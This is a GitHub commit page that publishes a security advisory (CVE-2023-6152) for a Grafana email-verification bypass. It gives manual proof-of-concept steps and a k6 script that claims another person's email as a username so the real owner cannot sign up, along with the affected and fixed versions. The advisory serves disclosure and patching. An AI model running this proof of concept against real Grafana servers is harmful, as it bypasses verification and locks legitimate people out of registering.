Skip to content

Commit

Permalink
Publish GHSA-3hv4-r2fm-h27f
Browse files Browse the repository at this point in the history
  • Loading branch information
@advisory-database
advisory-database[bot] committed Feb 13, 2024
1 parent 16d0cb8 commit 44311d2
Showing 1 changed file with 133 additions and 0 deletions.
133 changes: 133 additions & 0 deletions advisories/github-reviewed/2024/02/GHSA-3hv4-r2fm-h27f/GHSA-3hv4-r2fm-h27f.json
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,133 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3hv4-r2fm-h27f",
"modified": "2024-02-13T22:25:10Z",
"published": "2024-02-13T22:25:10Z",
"aliases": [
"CVE-2023-6152"
],
"summary": "Email Validation Bypass And Preventing Sign Up From Email's Owner",
"details": "### Summary\nEmail validation can easily be bypassed because `verify_email_enabled` option enable email validation at sign up only.\nA user changing it's email after signing up (and verifying it) can change it without verification in `/profile`.\nThis can be used to prevent legitimate owner of the email address from signing up.\n\nAnother way to prevent email's owner from signing up is by setting Username as an email:\nWhen a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.\n\n![](https://user-images.githubusercontent.com/44581623/282073913-c1a8c20b-b6c3-46eb-840c-9e0dae718a2a.png)\n\nHere user a prevents owner of [email protected] to signup.\n\n### Details\nI don't know exact location but this is related to PUT /api/user handler.\n\n### PoC\nBypass email validation:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change email to [email protected]\n* That's it, your using an email you don't own.\n\nPrevent email's owner from signing up:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change username (not email) to [[email protected]](mailto:[email protected])\n* Signout.\n* Try to sign up with email [[email protected]](mailto:[email protected])\n* Warning popup \"User with same email address already exists\"\n\nK6 script (with `verify_email_enabled` set to `false`):\n```js\nimport { check, group } from \"k6\"\nimport http from \"k6/http\"\n\nexport const options = {\n scenarios: {\n perVuIter: {\n executor: 'per-vu-iterations',\n vus: 1,\n iterations: 1\n }\n }\n}\n\nconst GRAFANA_URL = __ENV.GRAFANA_URL || \"http://localhost:3000\"\n\nexport default function () {\n group(\"create user_a with email [email protected]\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n group(\"change user_a login to [email protected]\", () => {\n const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"login\": \"[email protected]\", // user_b email.\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n http.cookieJar().clear(GRAFANA_URL)\n\n group(\"create user_b with email [email protected]\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"username\": \"[email protected]\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200 // fail\n })\n })\n}\n```\n\n### Impact\nBypass email verification.\nPrevent legitimate owner from signing up.\n",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
}
],
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "9.5.16"
}
]
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.11"
}
]
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.7"
}
]
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.4"
}
]
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.3"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
}
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2024-02-13T22:25:10Z",
"nvd_published_at": null
}
}

0 comments on commit 44311d2

Please sign in to comment.